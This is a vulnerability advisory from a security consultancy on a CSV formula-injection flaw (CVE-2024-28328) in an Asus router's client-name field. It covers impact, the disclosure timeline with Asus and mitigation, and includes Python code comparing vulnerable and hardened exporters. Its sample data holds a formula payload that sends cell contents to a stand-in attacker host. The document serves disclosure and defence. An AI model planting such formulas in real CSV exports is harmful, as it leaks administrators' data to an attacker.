Hardware / IoT | May 9, 2024

Asus RT-N12+ B1’s CSV Injection: CVE-2024-28328

A CSV Injection vulnerability, tracked as CVE-2024-28328, has been identified in the Asus RT-N12+ B1 router. CSV Injection (also called formula injection) lets an attacker plant spreadsheet formulas in text that the router later writes into a CSV file; when an administrator opens that file in Excel or a similar application, the formula is evaluated on their machine rather than displayed, which can lead to data leakage, compromise of the administrator's workstation and, from there, the network the router serves.

Affected product: ASUS RT-N12+ B1 (also sold as RT-N300 B1), firmware version 3.0.0.4.380.10931

Impact of the Vulnerability 

  • Data Breach: A formula injected into the exported CSV runs on the workstation of the administrator who opens it and can leak the contents of the sheet, for example by embedding cell values in a link to an attacker-controlled host. 
  • Network Compromise: Payloads such as DDE commands can launch a program on that workstation once the user accepts the spreadsheet's warning prompts; from an administrator's machine an attacker can reach the router's management interface and the rest of the network. 
  • Disruption of Services: A compromised administrator workstation or router can be used to disrupt connectivity or take services offline. 
  • Exploitation of Connected Devices: From that foothold, other devices on the network become reachable targets, amplifying the damage. 
  • Regulatory and Legal Ramifications: Organizations may face fines, legal liabilities, and reputational damage.

Timeline:  

  • 21/02/2024 – Initial contact: report submitted to Asus, outlining the vulnerability.  
  • 28/02/2024 – First follow-up sent to Asus.  
  • 05/03/2024 – Asus reply: acknowledgment received, with the statement below. 

Asus stated that the RT-N12+ B1 (RT-N300 B1) router has reached the end of its product life cycle and that firmware maintenance and updates for this model were discontinued years ago. Without updates, the device remains exposed to any security flaw present in its last released firmware. 

Asus also indicated that a beta version of the router's firmware is available for testing and asked for feedback on whether it resolves the reported issue. The beta firmware can be accessed via the following link: [link] 

  • 01/04/2024 – Second follow-up sent to Asus.  
  • 01/04/2024 – Asus reply: acknowledgment received.  
  • 02/04/2024 – Third follow-up sent to Asus.  
  • 12/04/2024 – Asus reply with the findings below.  

Asus reported that, on examination, the firmware image for this model has become too large to accommodate further changes and that the product has reached the end of its life cycle, both of which make ongoing maintenance difficult.

Asus again supplied a beta firmware build for the router and asked for feedback on whether it addresses the reported issue. The beta firmware file is available through the following link: [Asus Beta Firmware]  

Reference: CVE-2024-28328 (Tenable) 

Vulnerability Description: CSV Injection in Asus RT-N12+ B1 Router 

CSV Injection occurs when user-controlled text is written to a CSV file without neutralizing the characters a spreadsheet treats as the start of a formula (=, +, -, @, and also tab and carriage return). The CSV file itself is inert; the damage happens when an administrator opens the export in Excel or LibreOffice, which evaluates the cell instead of displaying it. Depending on the payload and on which warning prompts the user accepts, the formula can exfiltrate data from the sheet or execute a command on the administrator's workstation, giving an attacker a path from a low-privilege position on the network to the router's management interface and the systems behind it. 

Proof-of-Concept: Exploiting Excel Formulas in Client Name Parameter 

The injection point is the client name parameter: a client name that begins with a formula character is accepted by the router and reproduced unchanged in the CSV it generates, so the formula is evaluated as soon as an administrator opens the file in Excel. The consequences follow from the impact section above: leakage of data from the export, compromise of the administrator's workstation and, through it, the network, together with the regulatory exposure that brings.

Mitigation: 

The fix for CSV Injection is to treat every user-controlled value as untrusted when it is written to a CSV: reject or neutralize cells that begin with =, +, -, @, tab or carriage return (prefixing the cell with a single quote makes the spreadsheet store it as text), always enclose cells in double quotes with embedded quotes doubled so that a separator inside a value cannot create a new cell, and validate the value on input as well, so a formula never reaches the export in the first place.
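The following is an added example, not code from this advisory, from the router firmware or from Asus. It models the export pattern the proof-of-concept heading describes (a user-controlled client name written into a CSV) next to the hardened exporter the mitigation calls for, and adds an audit check that flags formula cells in an export before anyone opens it. The column names, the sample client records, the attacker host 203.0.113.5 and the helper function names are all constructed for illustration.

```python
import csv
import io

# Cell-leading characters a spreadsheet interprets as the start of a formula.
# "=", "+", "-" and "@" are the classic set; tab (0x09) and carriage return
# (0x0D) are also listed in OWASP's CSV injection guidance, so they are included.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def is_formula_cell(cell: str) -> bool:
    """Return True if a spreadsheet could evaluate this cell rather than display it.

    Leading spaces are stripped first as a conservative choice: importers differ
    in whether they trim them, so "  =1+1" is flagged as well.
    """
    return cell.lstrip(" ").startswith(FORMULA_TRIGGERS)


def neutralize_cell(cell: str) -> str:
    """Defang a dangerous cell by prefixing a single quote, which makes the
    spreadsheet store the content as text. Safe cells are returned unchanged."""
    return "'" + cell if is_formula_cell(cell) else cell


def export_clients_vulnerable(clients) -> str:
    """The vulnerable pattern: user-controlled fields are joined with commas verbatim.
    Besides passing formula characters through, an embedded comma splits the value
    into extra cells, so a formula can land in a column the exporter never intended."""
    lines = ["Client Name,MAC,IP"]
    for c in clients:
        lines.append(",".join([c["name"], c["mac"], c["ip"]]))
    return "\r\n".join(lines) + "\r\n"


def export_clients_hardened(clients) -> str:
    """The hardened exporter: every cell is double-quoted (so separators and quotes
    inside a value cannot break the row structure) and formula triggers are neutralized."""
    buf = io.StringIO(newline="")
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\r\n")
    writer.writerow(["Client Name", "MAC", "IP"])
    for c in clients:
        writer.writerow([neutralize_cell(c["name"]), c["mac"], c["ip"]])
    return buf.getvalue()


def parse_rows(text: str):
    """Parse CSV text the way a spreadsheet import would, into a list of rows."""
    return list(csv.reader(io.StringIO(text, newline="")))


def audit_csv(text: str):
    """Pre-open check for an export: return (row, column, cell) for every cell
    that a spreadsheet could evaluate as a formula."""
    hits = []
    for r, row in enumerate(parse_rows(text)):
        for col, cell in enumerate(row):
            if is_formula_cell(cell):
                hits.append((r, col, cell))
    return hits


# Constructed sample data (not captured from a router): four client records, three
# of which carry a name an attacker could supply, each exercising a different failure.
SAMPLE_CLIENTS = [
    {"name": "laptop-01", "mac": "aa:bb:cc:dd:ee:01", "ip": "192.168.1.10"},
    # Formula that sends the content of cell A1 to an attacker host when the link is followed.
    {"name": '=HYPERLINK("http://203.0.113.5/?c="&A1)', "mac": "aa:bb:cc:dd:ee:02", "ip": "192.168.1.11"},
    # Embedded separator: the unquoted exporter turns "-2+3" into its own formula cell.
    {"name": "tv,-2+3", "mac": "aa:bb:cc:dd:ee:03", "ip": "192.168.1.12"},
    # Leading tab: not in the classic "=+-@" list, but still a formula trigger.
    {"name": "\t=1+1", "mac": "aa:bb:cc:dd:ee:04", "ip": "192.168.1.13"},
]


if __name__ == "__main__":
    for label, exporter in (("vulnerable", export_clients_vulnerable),
                            ("hardened", export_clients_hardened)):
        output = exporter(SAMPLE_CLIENTS)
        print(f"--- {label} export ---")
        print(output)
        print("formula cells:", audit_csv(output))
```

Running it shows the vulnerable export carrying three formula cells, one of them in the MAC column because the comma in "tv,-2+3" split the name, while the hardened export carries none and keeps every row at three columns. The single-quote prefix is a blunt tool: it also alters legitimate values such as negative numbers or phone numbers written with a leading plus sign, so a real exporter should pair it with input validation that rejects such client names up front, as the mitigation above suggests.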

TL;DR

  • Issue: CSV Injection (formula injection) via the client name parameter in the Asus RT-N12+ B1 router, CVE-2024-28328. 
  • Impact: A formula planted in an exported CSV runs on the workstation of the administrator who opens it, which can lead to data leakage and compromise of the network behind the router. 
  • Response: Asus provided beta firmware for testing. 
  • Communication: Good coordination with Asus. 
  • Support: Asus has supplied updates, but the router's end-of-life status limits ongoing maintenance. 

Redfox Security is a diverse network of expert security consultants with a global mindset and a collaborative culture. If you are looking to improve your organization’s security posture, contact us today to discuss your security testing needs. Our team of security professionals can help you identify vulnerabilities and weaknesses in your systems and provide recommendations to remediate them.

“Join us on our journey of growth and development by signing up for our comprehensive courses.”

 


by Shravan Singh

Security Consultant | Redfox Security